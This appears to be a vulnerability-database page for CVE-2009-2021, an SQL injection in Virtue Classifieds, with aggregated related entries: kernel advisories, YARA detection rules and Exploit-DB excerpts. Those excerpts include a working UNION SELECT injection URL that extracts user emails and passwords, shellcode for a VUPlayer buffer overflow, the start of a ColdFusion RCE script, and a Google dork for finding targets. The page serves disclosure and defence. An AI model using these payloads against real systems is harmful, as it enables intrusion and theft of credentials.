CVE-2009-2021
published 2009-06-09CVE-2009-2021: SQL injection vulnerability in search.php in Virtue Classifieds allows remote attackers to execute arbitrary SQL commands via the category parameter.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.8th percentile
SQL injection vulnerability in search.php in Virtue Classifieds allows remote attackers to execute arbitrary SQL commands via the category parameter.
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.8HIGH
vendor_oracle4.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wqrc-78gp-95rp: SQL injection vulnerability in search
ghsa_unreviewed·2022-05-02
CVE-2009-2021 [HIGH] CWE-89 GHSA-wqrc-78gp-95rp: SQL injection vulnerability in search
SQL injection vulnerability in search.php in Virtue Classifieds allows remote attackers to execute arbitrary SQL commands via the category parameter.
Red Hat
kernel: PCI: pciehp: Fix infinite loop in IRQ handler upon power fault
vendor_redhat·2024-06-20·CVSS 5.5
CVE-2021-47617 [MEDIUM] CWE-835 kernel: PCI: pciehp: Fix infinite loop in IRQ handler upon power fault
kernel: PCI: pciehp: Fix infinite loop in IRQ handler upon power fault
In the Linux kernel, the following vulnerability has been resolved:
PCI: pciehp: Fix infinite loop in IRQ handler upon power fault
The Power Fault Detected bit in the Slot Status register differs from
all other hotplug events in that it is sticky: It can only be cleared
after turning off slot power. Per PCIe r5.0, sec. 6.7.1.8:
If a power controller detects a main power fault on the hot-plug slot,
it must automatically set its internal main power fault latch [...].
The main power fault latch is cleared when software turns off power to
the hot-plug slot.
The stickiness used to cause interrupt storms and infinite loops which
were fixed in 2009 by commits 5651c48cfafe ("PCI pciehp: fix power fault
interrupt storm problem"
Red Hat
kernel: x86/hyperv: Fix NULL deref in set_hv_tscchange_cb() if Hyper-V setup fails
vendor_redhat·2024-04-10·CVSS 5.5
CVE-2021-47217 [MEDIUM] CWE-476 kernel: x86/hyperv: Fix NULL deref in set_hv_tscchange_cb() if Hyper-V setup fails
kernel: x86/hyperv: Fix NULL deref in set_hv_tscchange_cb() if Hyper-V setup fails
In the Linux kernel, the following vulnerability has been resolved:
x86/hyperv: Fix NULL deref in set_hv_tscchange_cb() if Hyper-V setup fails
Check for a valid hv_vp_index array prior to derefencing hv_vp_index when
setting Hyper-V's TSC change callback. If Hyper-V setup failed in
hyperv_init(), the kernel will still report that it's running under
Hyper-V, but will have silently disabled nearly all functionality.
BUG: kernel NULL pointer dereference, address: 0000000000000010
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: 0000 [#1] SMP
CPU: 4 PID: 1 Comm: swapper/0 Not tainted 5.15.0-rc2+ #75
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0
Red Hat
kernel: btrfs: do not BUG_ON in link_to_fixup_dir
vendor_redhat·2024-03-25·CVSS 5.5
CVE-2021-47145 [MEDIUM] CWE-460 kernel: btrfs: do not BUG_ON in link_to_fixup_dir
kernel: btrfs: do not BUG_ON in link_to_fixup_dir
In the Linux kernel, the following vulnerability has been resolved:
btrfs: do not BUG_ON in link_to_fixup_dir
While doing error injection testing I got the following panic
kernel BUG at fs/btrfs/tree-log.c:1862!
invalid opcode: 0000 [#1] SMP NOPTI
CPU: 1 PID: 7836 Comm: mount Not tainted 5.13.0-rc1+ #305
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014
RIP: 0010:link_to_fixup_dir+0xd5/0xe0
RSP: 0018:ffffb5800180fa30 EFLAGS: 00010216
RAX: fffffffffffffffb RBX: 00000000fffffffb RCX: ffff8f595287faf0
RDX: ffffb5800180fa37 RSI: ffff8f5954978800 RDI: 0000000000000000
RBP: ffff8f5953af9450 R08: 0000000000000019 R09: 0000000000000001
R10: 000151f408682970 R11: 0000000120021001 R12: ffff8f5954978800
R13: ffff8f5952
Red Hat
kernel: tpm: efi: Use local variable for calculating final log size
vendor_redhat·2024-02-27·CVSS 5.5
CVE-2021-46951 [MEDIUM] CWE-191 kernel: tpm: efi: Use local variable for calculating final log size
kernel: tpm: efi: Use local variable for calculating final log size
In the Linux kernel, the following vulnerability has been resolved:
tpm: efi: Use local variable for calculating final log size
When tpm_read_log_efi is called multiple times, which happens when
one loads and unloads a TPM2 driver multiple times, then the global
variable efi_tpm_final_log_size will at some point become a negative
number due to the subtraction of final_events_preboot_size occurring
each time. Use a local variable to avoid this integer underflow.
The following issue is now resolved:
Mar 8 15:35:12 hibinst kernel: Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
Mar 8 15:35:12 hibinst kernel: Workqueue: tpm-vtpm vtpm_proxy_work [tpm_vtpm_proxy]
Mar 8 15:35:12 hibinst kernel: RIP: 001
Red Hat
mysql: Server: Security: Roles unspecified vulnerability (CPU Jan 2021)
vendor_redhat·2021-01-19·CVSS 4.9
CVE-2021-2009 [MEDIUM] mysql: Server: Security: Roles unspecified vulnerability (CPU Jan 2021)
mysql: Server: Security: Roles unspecified vulnerability (CPU Jan 2021)
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
Package: mysql (Red Hat Enterprise Linux 6) - Not affected
Package: mariadb (Red Hat Enterprise Linux 7) - Not affected
Package: mariadb:10.3/mariadb (Red Hat Enterprise
Oracle
Oracle Oracle MySQL Risk Matrix: Server: Security: Roles — CVE-2021-2009
vendor_oracle·2021-01-15·CVSS 4.9
CVE-2021-2009 [MEDIUM] Oracle Oracle MySQL Risk Matrix: Server: Security: Roles — CVE-2021-2009
Oracle Oracle MySQL Risk Matrix: Server: Security: Roles vulnerability
CVE: CVE-2021-2009
CVSS: 4.9
Protocol: MySQL Protocol
Remote exploit: No
Affected versions: Network
Advisory: cpujan2021 (JAN 2021)
YARA
Linux_Exploit_CVE_2009_2698_12374e97
yara·CVSS 7.8
CVE-2009-2698 [HIGH] Linux_Exploit_CVE_2009_2698_12374e97
rule Linux_Exploit_CVE_2009_2698_12374e97 {
meta:
author = "Elastic Security"
id = "12374e97-385e-4b3a-9d50-39f35ad4f6dd"
fingerprint = "2c669220ac8909e2336bbf9c38489c8e32d573ab6c29fa1e2e0c1fe69f7441ed"
creation_date = "2021-01-12"
last_modified = "2021-09-16"
threat_name = "Linux.Exploit.CVE-2009-2698"
reference_sample = "656fddc1bf4743a08a455628b6151076b81e604ff49c93d797fa49b1f7d09c2f"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { 74 64 6F 75 74 00 66 77 72 69 74 65 00 64 65 73 63 00 63 76 65 00 }
condition:
all of them
}
YARA
Linux_Exploit_CVE_2009_2698_cc04dddd
yara·CVSS 7.8
CVE-2009-2698 [HIGH] Linux_Exploit_CVE_2009_2698_cc04dddd
rule Linux_Exploit_CVE_2009_2698_cc04dddd {
meta:
author = "Elastic Security"
id = "cc04dddd-91d0-4c5f-a0ac-01787da7f369"
fingerprint = "d3fdd66e486cb06bd63f6d8e471e66bc80990c4f0729eea16b47adc4cac80538"
creation_date = "2021-04-06"
last_modified = "2021-09-16"
threat_name = "Linux.Exploit.CVE-2009-2698"
reference_sample = "502b73ea04095e8a7ec4e8d7cc306242b45850ad28690156754beac8cd8d7b2d"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { C4 10 89 45 F4 83 7D F4 FF 75 1F 83 EC 0C 68 }
condition:
all of them
}
YARA
Linux_Exploit_CVE_2009_2908_406c2fef
yara·CVSS 4.9
CVE-2009-2908 [MEDIUM] Linux_Exploit_CVE_2009_2908_406c2fef
rule Linux_Exploit_CVE_2009_2908_406c2fef {
meta:
author = "Elastic Security"
id = "406c2fef-0f1a-441a-96b9-e4168c283c90"
fingerprint = "94a94217823a8d682ba27889ba2b53fef7b18ae14d75a73456f21184e51581cf"
creation_date = "2021-01-12"
last_modified = "2021-09-16"
threat_name = "Linux.Exploit.CVE-2009-2908"
reference_sample = "1e05a23f5b3b9cfde183aec26b723147e1816b95dc0fb7f9ac57376efcb22fcd"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { 74 00 66 70 72 69 6E 74 66 00 66 77 72 69 74 65 00 64 65 73 }
condition:
all of them
}
YARA
Linux_Exploit_CVE_2009_1897_6cf0a073
yara·CVSS 6.9
CVE-2009-1897 [MEDIUM] Linux_Exploit_CVE_2009_1897_6cf0a073
rule Linux_Exploit_CVE_2009_1897_6cf0a073 {
meta:
author = "Elastic Security"
id = "6cf0a073-571e-48ef-be58-807bff1a5e97"
fingerprint = "8fcb3687d4ec5dd467d937787f0659448a91446f92a476ff7ba471a02d6b07a9"
creation_date = "2021-01-12"
last_modified = "2021-09-16"
threat_name = "Linux.Exploit.CVE-2009-1897"
reference_sample = "85f371bf73ee6d8fcb6fa9a8a68b38c5e023151257fd549855c4c290cc340724"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { 31 C0 85 DB 78 28 45 31 C9 41 89 D8 B9 02 00 00 00 BA 01 00 }
condition:
all of them
}
Exploit-DB
VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
exploitdb·2022-01-10·CVSS 8.8
CVE-2009-0182 [HIGH] VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
---
# Exploit Title: VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
# Date: 26/06/2021
# Exploit Author: Bryan Leong
# Vendor Homepage: http://www.vuplayer.com/
# Software Link: [Null]
# Version: VUPlayer 2.49
# Tested on: Windows 7 x64
# CVE : CVE-2009-0182
# VUPlayer 2.49 Local Buffer Overflow to Arbitrary Code Execution (Importing .wax playlist file) (Bypass DEP protection)
import struct
#shellcode
#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a" -f python
buf = b""
buf += b"\xd9\xea\xba\x33\x44\x3b\x11\xd9\x74\x24\xf4\x5d\x33"
buf += b"\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\x27\xa6"
buf += b"\xce\xed\xaf\xa4\x31\x0e\x2f\xc9\xb8\xeb\x1e\xc9\xdf"
buf += b"\x78\x30\xf9\x94\x2d\xbc\x72\xf8\xc5\x37\xf6\
Exploit-DB
Adobe ColdFusion 8 - Remote Command Execution (RCE)
exploitdb·2021-06-24·CVSS 7.5
CVE-2009-2265 [HIGH] Adobe ColdFusion 8 - Remote Command Execution (RCE)
Adobe ColdFusion 8 - Remote Command Execution (RCE)
---
# Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE)
# Google Dork: intext:"adobe coldfusion 8"
# Date: 24/06/2021
# Exploit Author: Pergyz
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
# Version: 8
# Tested on: Microsoft Windows Server 2008 R2 Standard
# CVE : CVE-2009-2265
#!/usr/bin/python3
from multiprocessing import Process
import io
import mimetypes
import os
import urllib.request
import uuid
class MultiPartForm:
def __init__(self):
self.files = []
self.boundary = uuid.uuid4().hex.encode('utf-8')
return
def get_content_type(self):
return 'multipart/form-data; boundary={}'.format(self.boundary.decode('utf-8'))
def add_file(self, fieldname, filename, fileHandle, mimetype=None)
Exploit-DB
Virtue Classifieds - 'category' SQL Injection
exploitdb·2009-06-08
CVE-2009-2021 Virtue Classifieds - 'category' SQL Injection
Virtue Classifieds - 'category' SQL Injection
---
#################################################################################################################################################
CMS : Virtue Classifieds
WEB : http://www.virtuenetz.com/classified/
Archivo : search.php
Variable Tipo : GET
Valor : category
Tipo : SQL Injection
Url : http:/www.site.com/search.php?category=[SQLI]
PoC:
http:/www.site.com/search.php?category=2+and+1=0+union+select+all+1,2,concat_ws(0x3A,email,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--
Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.
100% CHILE
WWW.UNDERSECURITY.NET
############################################
No writeups or analysis indexed.
2009-06-09
Published